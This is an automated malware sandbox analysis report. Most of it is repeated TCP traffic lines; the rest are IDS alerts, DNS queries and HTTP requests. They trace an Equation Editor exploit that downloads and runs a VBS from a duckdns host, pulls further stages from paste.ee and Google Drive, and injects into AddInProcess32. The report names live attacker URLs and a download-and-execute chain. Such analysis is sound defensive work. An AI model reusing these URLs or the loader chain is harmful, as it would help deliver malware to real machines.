                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound : 198.46.178.134:80 -> 192.168.2.22:49168
                      Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: C:\Windows\SysWOW64\wscript.exeDomain query: paste.ee
                      Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 188.114.96.3 443Jump to behavior
                      Source: unknownDNS query: name: paste.ee
                      Source: unknownDNS query: name: paste.ee
                      Source: unknownDNS query: name: wednesdayyyyyyfile.duckdns.org
                      Source: Yara matchFile source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.74eab28.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.6350000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 3_2_035006DC URLDownloadToFileW,ShellExecuteW,ExitProcess,3_2_035006DC
                      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /equitosssssssdroidlatest.txt HTTP/1.1Host: wednesdayyyyyyfile.duckdns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                      Source: Joe Sandbox ViewIP Address: 198.46.178.134 198.46.178.134
                      Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDNS query: name: ip-api.com
                      Source: global trafficHTTP traffic detected: GET /d/nwtkd HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                      Source: global trafficHTTP traffic detected: GET /wednesdaysMPDW-constraints.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wednesdayyyyyyfile.duckdns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /d/nwtkd HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49165 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.22:49166 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.22:49167 version: TLS 1.0
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 3_2_035006DC URLDownloadToFileW,ShellExecuteW,ExitProcess,3_2_035006DC
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\wednesdaysMPDW-constraints[1].vbsJump to behavior
                      Source: global trafficHTTP traffic detected: GET /d/nwtkd HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wednesdaysMPDW-constraints.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wednesdayyyyyyfile.duckdns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /d/nwtkd HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                      Source: global trafficHTTP traffic detected: GET /equitosssssssdroidlatest.txt HTTP/1.1Host: wednesdayyyyyyfile.duckdns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: global trafficDNS traffic detected: DNS query: wednesdayyyyyyfile.duckdns.org
                      Source: global trafficDNS traffic detected: DNS query: paste.ee
                      Source: global trafficDNS traffic detected: DNS query: drive.google.com
                      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                      Source: global trafficDNS traffic detected: DNS query: ip-api.com
                      Source: wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.525769987.0000000004EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.525769987.0000000004EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.525769987.0000000004EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.525769987.0000000004EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.525769987.0000000004EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.525769987.0000000004EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.525769987.0000000004EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: AddInProcess32.exe, 0000000A.00000002.623977936.000000000241C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.623977936.0000000002438000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.623977936.0000000002381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                      Source: powershell.exe, 00000009.00000002.526475419.00000000074EA000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.623977936.000000000241C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.623077107.0000000000580000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.622833840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.623977936.0000000002381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                      Source: powershell.exe, 00000009.00000002.520640546.0000000003479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.525769987.0000000004EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.525769987.0000000004EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
